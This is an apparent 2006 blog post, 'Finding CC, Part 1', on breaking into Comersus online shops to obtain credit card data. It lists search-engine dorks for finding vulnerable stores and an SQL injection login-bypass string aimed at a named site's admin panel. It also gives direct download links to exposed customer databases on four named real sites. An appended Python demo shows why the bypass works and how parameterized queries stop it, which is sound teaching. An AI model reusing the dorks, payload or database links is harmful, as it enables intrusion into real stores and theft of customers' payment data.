Wednesday, July 12, 2006

Finding CC, Part 1

Comersus Bug

Google dork:
allinurl:"Powered by COmersus"
allinurl:/shopdisplaycategories.asp
allinurl:/comersus_backoffice_login.php
allinurl:/backoffice/
allinurl:/backofficegold/
allinurl:/comersus_contactUs.asp
Example admin login locations:
For the logins above, you can perform SQL injection as shown below:
http://www.sheardelight.net/backofficegold/
login : ' OR adminname <> '' OR adminname = '
pass : ' OR adminname <> '' OR adminname = '
If injection does not work, you can download the database here.
Example database locations:
http://latintradingbooks.com/comersus/database/comersus.mdb
http://www.braziliancd.com/Comersus/database/comersus.mdb
http://www.sidewindercycle.com/database/comersus.mdb
http://www.sillyprat.co.uk/shop/database/comersus.mdb
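
The login bypass described above works only when the form input is pasted into the SQL text. The following is an added example, not code from the original post or from Comersus: it uses Python's sqlite3 as a stand-in for the ASP/Access back end, and the query shape, the table name admins and the column adminpassword are assumptions (only adminname appears in the post).

```python
import sqlite3

# String from the post, used for both the login and the password field.
PAYLOAD = "' OR adminname <> '' OR adminname = '"


def make_db():
    """Build a constructed in-memory admin table (names are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (adminname TEXT, adminpassword TEXT)")
    # Plaintext only to keep the sketch short; store a salted hash in practice.
    db.execute("INSERT INTO admins VALUES ('admin', 'S3cret-constructed')")
    return db


def build_concat_sql(name, password):
    """Vulnerable pattern: user input becomes part of the SQL text."""
    return ("SELECT adminname FROM admins WHERE adminname = '" + name +
            "' AND adminpassword = '" + password + "'")


def login_concat(db, name, password):
    """Login check built by concatenation (the 'before' of the fix)."""
    return db.execute(build_concat_sql(name, password)).fetchone() is not None


def login_param(db, name, password):
    """Hardened check: placeholders keep the input as data, never as SQL."""
    sql = ("SELECT adminname FROM admins "
           "WHERE adminname = ? AND adminpassword = ?")
    return db.execute(sql, (name, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # The quotes in the input close the string literal, so the WHERE clause
    # gains an "adminname <> ''" branch that is true for every real account.
    print(build_concat_sql(PAYLOAD, PAYLOAD))
    print("concatenated query accepts it:", login_concat(db, PAYLOAD, PAYLOAD))
    print("parameterized query accepts it:", login_param(db, PAYLOAD, PAYLOAD))
```

Parameter binding does not address the second issue in the post, a database file stored under the web root; that file has to be moved outside the served directory or blocked by the web server.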
